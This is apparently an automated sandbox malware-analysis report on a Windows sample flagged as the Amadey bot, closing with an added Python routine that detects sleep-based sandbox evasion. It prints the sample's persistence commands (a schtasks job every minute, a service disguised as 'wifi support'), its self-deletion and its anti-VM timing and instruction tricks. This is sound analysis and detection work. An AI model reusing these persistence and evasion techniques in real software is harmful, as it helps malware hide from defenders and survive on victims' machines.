                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exe | Code function: 8_2_009356F0 pushad ; ret
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exe | Code function: 8_2_00936183 pushfd ; ret
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exe | Code function: 8_2_00936151 pushfd ; ret
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe | Code function: 13_2_00138508 push 00000028h; retf 0000h
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe | Code function: 13_2_0013764A push esp; ret
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe | Code function: 13_2_00B54003 push esi; retf
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe | Code function: 13_2_025BCF78 pushfd ; retf
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe | Code function: 13_2_025BCF38 pushad ; retf
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe | Code function: 0_2_00435670 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                          Source: 3F71.exe.2.dr | Static PE information: 0xA22A793F [Sun Mar 19 11:55:43 2056 UTC]
                          Source: zmbGUZTICp.exe | Static PE information: section name: .zug
                          Source: zmbGUZTICp.exe | Static PE information: section name: .nafuti
                          Source: zmbGUZTICp.exe | Static PE information: section name: .karom
                          Source: 2DB3.exe.2.dr | Static PE information: section name: .gave
                          Source: 2DB3.exe.2.dr | Static PE information: section name: .noduf
                          Source: 2DB3.exe.2.dr | Static PE information: section name: .gafal
                          Source: 309C.exe.2.dr | Static PE information: section name: .nife
                          Source: 309C.exe.2.dr | Static PE information: section name: .kiza
                          Source: 309C.exe.2.dr | Static PE information: section name: .lagoti
                          Source: BC16.exe.2.dr | Static PE information: section name: .gizi
                          Source: BC16.exe.2.dr | Static PE information: section name: .bur
                          Source: BC16.exe.2.dr | Static PE information: section name: .wob
                          Source: D452.exe.2.dr | Static PE information: section name:
                          Source: D452.exe.2.dr | Static PE information: section name:
                          Source: D452.exe.2.dr | Static PE information: section name:
                          Source: D452.exe.2.dr | Static PE information: section name:
                          Source: D452.exe.2.dr | Static PE information: section name:
                          Source: D452.exe.2.dr | Static PE information: section name:
                          Source: D452.exe.2.dr | Static PE information: section name: .28gybOo
                          Source: D452.exe.2.dr | Static PE information: section name: .adata
                          Source: 239.exe.2.dr | Static PE information: section name:
                          Source: 239.exe.2.dr | Static PE information: section name:
                          Source: 239.exe.2.dr | Static PE information: section name:
                          Source: 239.exe.2.dr | Static PE information: section name:
                          Source: 239.exe.2.dr | Static PE information: section name:
                          Source: 239.exe.2.dr | Static PE information: section name:
                          Source: 239.exe.2.dr | Static PE information: section name: .28gybOo
                          Source: 239.exe.2.dr | Static PE information: section name: .adata
                          Source: 2D04.exe.2.dr | Static PE information: section name: .didata
                          Source: gdrgbdj.2.dr | Static PE information: section name: .zug
                          Source: gdrgbdj.2.dr | Static PE information: section name: .nafuti
                          Source: gdrgbdj.2.dr | Static PE information: section name: .karom
                          Source: tejjnepq.exe.11.dr | Static PE information: section name: .nife
                          Source: tejjnepq.exe.11.dr | Static PE information: section name: .kiza
                          Source: tejjnepq.exe.11.dr | Static PE information: section name: .lagoti
                          Source: initial sample | Static PE information: section where entry point is pointing to: .didata
                          Source: 3F71.exe.2.dr | Static PE information: real checksum: 0x0 should be: 0x9011f
                          Source: D452.exe.2.dr | Static PE information: real checksum: 0x3721bb should be: 0x373654
                          Source: 239.exe.2.dr | Static PE information: real checksum: 0x3721bb should be: 0x373654
                          Source: initial sample | Static PE information: section name: .text entropy: 6.95435391538
                          Source: initial sample | Static PE information: section name: .text entropy: 6.98468263043
                          Source: initial sample | Static PE information: section name: .text entropy: 6.966095877
                          Source: initial sample | Static PE information: section name: .text entropy: 7.2566886804
                          Source: initial sample | Static PE information: section name: entropy: 7.99714766582
                          Source: initial sample | Static PE information: section name: entropy: 7.90784224501
                          Source: initial sample | Static PE information: section name: entropy: 7.99361781473
                          Source: initial sample | Static PE information: section name: entropy: 7.80912989946
                          Source: initial sample | Static PE information: section name: .rsrc entropy: 7.22348700263
                          Source: initial sample | Static PE information: section name: .28gybOo entropy: 7.91849564721
                          Source: initial sample | Static PE information: section name: entropy: 7.99714766582
                          Source: initial sample | Static PE information: section name: entropy: 7.90784224501
                          Source: initial sample | Static PE information: section name: entropy: 7.99361781473
                          Source: initial sample | Static PE information: section name: entropy: 7.80912989946
                          Source: initial sample | Static PE information: section name: .rsrc entropy: 7.22348700263
                          Source: initial sample | Static PE information: section name: .28gybOo entropy: 7.91849564721
                          Source: initial sample | Static PE information: section name: .didata entropy: 7.99713235918
                          Source: initial sample | Static PE information: section name: .text entropy: 6.95435391538
                          Source: initial sample | Static PE information: section name: .text entropy: 6.966095877
                          Source: 3F71.exe.2.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 3F71.exe.2.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 13.2.3F71.exe.130000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 13.2.3F71.exe.130000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 13.0.3F71.exe.130000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 13.0.3F71.exe.130000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 13.0.3F71.exe.130000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 13.0.3F71.exe.130000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 13.0.3F71.exe.130000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 13.0.3F71.exe.130000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 28.0.3F71.exe.fa0000.11.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 28.0.3F71.exe.fa0000.11.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs | High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'

                          Persistence and Installation Behavior:

                          Yara detected Amadey bot
                          Source: Yara match | File source: dump.pcap, type: PCAP
                          Source: Yara match | File source: 00000024.00000002.645388633.0000000000712000.00000004.00000001.sdmp, type: MEMORY
                          Drops executables to the windows directory (C:\Windows) and starts them
                          Source: unknown | Executable created and started: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe
                          Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\gdrgbdj
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File created: C:\Users\user\AppData\LocalLow\sG8rM8v\lgpllibs.dll
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File created: C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll
                          Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\gdrgbdj
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File created: C:\Users\user\AppData\LocalLow\sG8rM8v\nssdbm3.dll
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File created: C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File created: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File created: C:\Users\user\AppData\LocalLow\sG8rM8v\ucrtbase.dll
                          Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\D452.exe
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File created: C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll
                          Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\239.exe
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File created: C:\Users\user\AppData\LocalLow\sG8rM8v\vcruntime140.dll
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File created: C:\Users\user\AppData\LocalLow\sG8rM8v\prldap60.dll
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File created: C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy_InUse.dll
                          Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\2DB3.exe
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File created: C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll
                          Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\2D04.exe
                          Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\3F71.exe
                          Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\1D34.exe
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File created: C:\Users\user\AppData\LocalLow\sG8rM8v\qipcap.dll
                          Source: C:\Users\user\AppData\Local\Temp\309C.exe | File created: C:\Users\user\AppData\Local\Temp\tejjnepq.exe
                          Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\BC16.exe
                          Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\A7F0.exe
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File created: C:\Users\user\AppData\LocalLow\sG8rM8v\libEGL.dll
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File created: C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll
                          Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe (copy)
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File created: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File created: C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File created: C:\Users\user\AppData\LocalLow\sG8rM8v\softokn3.dll
                          Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\1E7F.exe
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
                          Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\309C.exe
                          Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe (copy)

                          Boot Survival:

                          Uses schtasks.exe or at.exe to add and modify task schedules
                          Source: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F
                          Source: C:\Windows\SysWOW64\svchost.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ozuqupbe
                          Source: C:\Users\user\AppData\Local\Temp\309C.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ozuqupbe binPath= "C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d\"C:\Users\user\AppData\Local\Temp\309C.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\309C.exe | Code function: 11_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          Hooking and other Techniques for Hiding and Protection:

                          Deletes itself after installationShow sources
                          Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\zmbguzticp.exeJump to behavior
                          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                          Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\gdrgbdj:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Code function: 8_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX (4 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\309C.exe; Process information set: NOGPFAULTERRORBOX (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\309C.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\309C.exe; Process information set: NOGPFAULTERRORBOX (4 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX (20 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3F71.exe; Process information set: NOOPENFILEERRORBOX (23 occurrences)
Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe; Process information set: NOGPFAULTERRORBOX (2 occurrences)
Source: C:\Windows\SysWOW64\netsh.exe; Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe; Process information set: NOGPFAULTERRORBOX (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\3F71.exe; Process information set: NOOPENFILEERRORBOX (34 occurrences)

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Tries to evade analysis by executing a special instruction that causes a usermode exception
Source: C:\Users\user\AppData\Local\Temp\2D04.exe; Special instruction interceptor: First address: 0000000001184D4A instructions 0F0B caused by: Known instruction #UD exception
Source: C:\Users\user\AppData\Local\Temp\2D04.exe; Special instruction interceptor: First address: 000000000118786A instructions 0F3F070BC745FCFFFFFFFF33C033D2 caused by: Unknown instruction #UD exception
Source: C:\Users\user\AppData\Local\Temp\2D04.exe; Special instruction interceptor: First address: 000000000118E94A instructions 0F3F070BC745FCFFFFFFFF33C033D2 caused by: Unknown instruction #UD exception
Source: C:\Users\user\AppData\Local\Temp\2D04.exe; Special instruction interceptor: First address: 000000000118D6F3 instructions 0F0B caused by: Known instruction #UD exception
Source: C:\Users\user\AppData\Local\Temp\2D04.exe; Special instruction interceptor: First address: 0000000001196BA2 instructions 0F0B caused by: Known instruction #UD exception
Source: C:\Users\user\AppData\Local\Temp\2D04.exe; Special instruction interceptor: First address: 0000000001197440 instructions 0F0B caused by: Known instruction #UD exception
Source: C:\Users\user\AppData\Local\Temp\2D04.exe; Special instruction interceptor: First address: 000000000118CA3D instructions 0F0B caused by: Known instruction #UD exception
Source: C:\Users\user\AppData\Local\Temp\2D04.exe; Special instruction interceptor: First address: 0000000001331147 instructions 0F0B caused by: Known instruction #UD exception
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: gdrgbdj, 00000006.00000002.462563738.000000000048B000.00000004.00000020.sdmp; Binary or memory string: ASWHOOK
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Evasive API call chain: GetUserDefaultLangID, ExitProcess
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\D452.exe; RDTSC instruction interceptor: First address: 00000000008841C1 second address: 00000000008841C7 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov edi, esi 0x00000005 push esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\D452.exe; RDTSC instruction interceptor: First address: 00000000008841C7 second address: 0000000000794FA4 instructions: 0x00000000 rdtsc 0x00000002 cwd 0x00000004 lahf 0x00000005 inc ecx 0x00000006 push esp 0x00000007 inc ecx 0x00000008 setno cl 0x0000000b cbw 0x0000000d push ebx 0x0000000e inc cx 0x00000010 movzx esi, ch 0x00000013 inc ecx 0x00000014 mov cl, E5h 0x00000016 push edi 0x00000017 jmp 00007F75E8AACCC4h 0x0000001c pushfd 0x0000001d cwde 0x0000001e bswap eax 0x00000020 push ebp 0x00000021 cwd 0x00000023 dec ecx 0x00000024 ror edi, 03h 0x00000027 jmp 00007F75E8AD9070h 0x0000002c dec esp 0x0000002d lea edi, dword ptr [FF86B0BCh] 0x00000033 inc ecx 0x00000034 push edi 0x00000035 inc ecx 0x00000036 add dh, 00000065h 0x00000039 inc cx 0x0000003b rcr ecx, 29h 0x0000003e dec esp 0x0000003f mov ecx, dword ptr [esp+00000090h] 0x00000046 cwd 0x00000048 inc ecx 0x00000049 neg ecx 0x0000004b rcl esi, cl 0x0000004d inc ecx 0x0000004e ror ecx, 02h 0x00000051 inc ecx 0x00000052 inc ecx 0x00000054 dec ebp 0x00000055 and esi, edi 0x00000057 inc ebp 0x00000058 test bl, bl 0x0000005a inc ecx 0x0000005b bswap ecx 0x0000005d dec ebp 0x0000005e add ecx, edi 0x00000060 inc cx 0x00000062 rol esi, FFFFFFA4h 0x00000065 dec eax 0x00000066 mov esi, esp 0x00000068 inc ecx 0x00000069 adc bl, FFFFFFD9h 0x0000006c dec eax 0x0000006d sub esp, 00000140h 0x00000073 dec eax 0x00000074 cwde 0x00000075 inc bp 0x00000077 btr esi, esi 0x0000007a cbw 0x0000007c dec eax 0x0000007d and esp, FFFFFFF0h 0x00000083 dec eax 0x00000084 bt edx, edi 0x00000087 dec ebp 0x00000088 mov esi, ecx 0x0000008a btc dx, FFDCh 0x0000008f dec ebp 0x00000090 movzx ebx, cx 0x00000093 rdtsc
Source: C:\Users\user\AppData\Local\Temp\D452.exe; RDTSC instruction interceptor: First address: 000000000083A52F second address: 000000000083A535 instructions: 0x00000000 rdtsc 0x00000002 dec cl 0x00000004 neg cl 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\239.exe; RDTSC instruction interceptor: First address: 00000000008841C1 second address: 00000000008841C7 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov edi, esi 0x00000005 push esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\239.exe; RDTSC instruction interceptor: First address: 00000000008841C7 second address: 0000000000794FA4 instructions: 0x00000000 rdtsc 0x00000002 cwd 0x00000004 lahf 0x00000005 inc ecx 0x00000006 push esp 0x00000007 inc ecx 0x00000008 setno cl 0x0000000b cbw 0x0000000d push ebx 0x0000000e inc cx 0x00000010 movzx esi, ch 0x00000013 inc ecx 0x00000014 mov cl, E5h 0x00000016 push edi 0x00000017 jmp 00007F75E924B754h 0x0000001c pushfd 0x0000001d cwde 0x0000001e bswap eax 0x00000020 push ebp 0x00000021 cwd 0x00000023 dec ecx 0x00000024 ror edi, 03h 0x00000027 jmp 00007F75E9277B00h 0x0000002c dec esp 0x0000002d lea edi, dword ptr [FF86B0BCh] 0x00000033 inc ecx 0x00000034 push edi 0x00000035 inc ecx 0x00000036 add dh, 00000065h 0x00000039 inc cx 0x0000003b rcr ecx, 29h 0x0000003e dec esp 0x0000003f mov ecx, dword ptr [esp+00000090h] 0x00000046 cwd 0x00000048 inc ecx 0x00000049 neg ecx 0x0000004b rcl esi, cl 0x0000004d inc ecx 0x0000004e ror ecx, 02h 0x00000051 inc ecx 0x00000052 inc ecx 0x00000054 dec ebp 0x00000055 and esi, edi 0x00000057 inc ebp 0x00000058 test bl, bl 0x0000005a inc ecx 0x0000005b bswap ecx 0x0000005d dec ebp 0x0000005e add ecx, edi 0x00000060 inc cx 0x00000062 rol esi, FFFFFFA4h 0x00000065 dec eax 0x00000066 mov esi, esp 0x00000068 inc ecx 0x00000069 adc bl, FFFFFFD9h 0x0000006c dec eax 0x0000006d sub esp, 00000140h 0x00000073 dec eax 0x00000074 cwde 0x00000075 inc bp 0x00000077 btr esi, esi 0x0000007a cbw 0x0000007c dec eax 0x0000007d and esp, FFFFFFF0h 0x00000083 dec eax 0x00000084 bt edx, edi 0x00000087 dec ebp 0x00000088 mov esi, ecx 0x0000008a btc dx, FFDCh 0x0000008f dec ebp 0x00000090 movzx ebx, cx 0x00000093 rdtsc
Source: C:\Users\user\AppData\Local\Temp\239.exe; RDTSC instruction interceptor: First address: 000000000083A52F second address: 000000000083A535 instructions: 0x00000000 rdtsc 0x00000002 dec cl 0x00000004 neg cl 0x00000006 rdtsc
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\zmbGUZTICp.exe; Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 occurrences)
Source: C:\Users\user\AppData\Roaming\gdrgbdj; Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 occurrences)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Code function: 8_2_00406AA0
Found evasive API chain (may stop execution after checking computer name)
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe; Evasive API call chain: GetComputerName,DecisionNodes,Sleep
Source: C:\Windows\explorer.exe TID: 4828; Thread sleep count: 625 > 30
Source: C:\Windows\explorer.exe TID: 4628; Thread sleep count: 302 > 30
Source: C:\Windows\explorer.exe TID: 4628; Thread sleep time: -30200s >= -30000s
Source: C:\Windows\explorer.exe TID: 4544; Thread sleep count: 270 > 30
Source: C:\Windows\explorer.exe TID: 5632; Thread sleep count: 500 > 30
Source: C:\Windows\explorer.exe TID: 5592; Thread sleep count: 216 > 30
Source: C:\Windows\explorer.exe TID: 5672; Thread sleep count: 224 > 30
Source: C:\Users\user\AppData\Local\Temp\3F71.exe TID: 5224; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 4680; Thread sleep count: 50 > 30
Source: C:\Windows\SysWOW64\svchost.exe TID: 4680; Thread sleep time: -50000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4112; Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe TID: 5904; Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed (5 occurrences)
Source: C:\Users\user\AppData\Local\Temp\309C.exe; Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\3F71.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\explorer.exe; Window / User API: threadDelayed 625
Source: C:\Windows\explorer.exe; Window / User API: threadDelayed 500
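The sleep figures above need one reading note. NtDelayExecution takes a signed 64-bit interval in 100-nanosecond units, negative for relative delays, and the sandbox reports aggregated values. The numbers line up with milliseconds rather than seconds (302 sleeps of 100 ms give the 30200 shown against a 30000 threshold, and 922337203685477 is INT64_MAX in 100-ns units divided by 10^4, i.e. the largest possible relative wait), so the "s" suffix is best read as ms; that unit inference is mine, not something the report states. The following Python is an added example, not from the report, that converts raw intervals, aggregates them per thread, and applies the same thresholds (count > 30, cumulative 30000 ms) plus an explicit flag for the effectively infinite wait that a sandbox with sleep skipping would otherwise compress silently. The sample records are constructed to mirror the report's threads.

```python
INT64_MAX = (1 << 63) - 1
INFINITE_MS = INT64_MAX // 10_000        # 922337203685477, the value in the report


def delay_to_ms(raw):
    """Interpret an NtDelayExecution DelayInterval (signed 64-bit LARGE_INTEGER).
    Negative values are relative delays in 100-ns units; zero yields the time
    slice; positive values are absolute times and have no duration without a
    clock reference, so they return None."""
    if raw < 0:
        return -raw // 10_000
    return 0 if raw == 0 else None


# Constructed sleep records (thread id, raw DelayInterval). TID 4628 mirrors the
# report's 302 x 100 ms, TID 5224 its 'infinite' wait, TID 4112 a single 30 s sleep.
SAMPLE_SLEEPS = (
    [(4628, -100 * 10_000)] * 302
    + [(5224, -INT64_MAX)]
    + [(4112, -30_000 * 10_000)]
    + [(6000, -10 * 10_000)] * 5
)


def analyze_sleeps(events, count_threshold=30, total_ms_threshold=30_000):
    """Aggregate sleeps per thread and apply the report's thresholds (assumed
    to be per-thread count > 30 and cumulative delay >= 30000 ms)."""
    per_tid = {}
    for tid, raw in events:
        ms = delay_to_ms(raw)
        if ms is None:
            continue
        d = per_tid.setdefault(tid, {"count": 0, "total_ms": 0, "max_ms": 0})
        d["count"] += 1
        d["total_ms"] += ms
        d["max_ms"] = max(d["max_ms"], ms)
    verdicts = {}
    for tid, d in per_tid.items():
        flags = []
        if d["count"] > count_threshold:
            flags.append("sleep count %d > %d" % (d["count"], count_threshold))
        if d["total_ms"] >= total_ms_threshold:
            flags.append("cumulative sleep %d ms >= %d ms" % (d["total_ms"], total_ms_threshold))
        if d["max_ms"] >= INFINITE_MS:
            flags.append("effectively infinite wait")
        verdicts[tid] = {**d, "flags": flags}
    return verdicts
```

The per-thread split matters: a handful of 100 ms sleeps spread across worker threads is normal, while one thread burning 30 s in a loop, or parking itself forever after a failed check, is the stalling pattern the "Contains functionality to detect sleep reduction" finding pairs with (the sample compares GetTickCount deltas around its sleeps, so simply shortening them in the sandbox is detectable).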
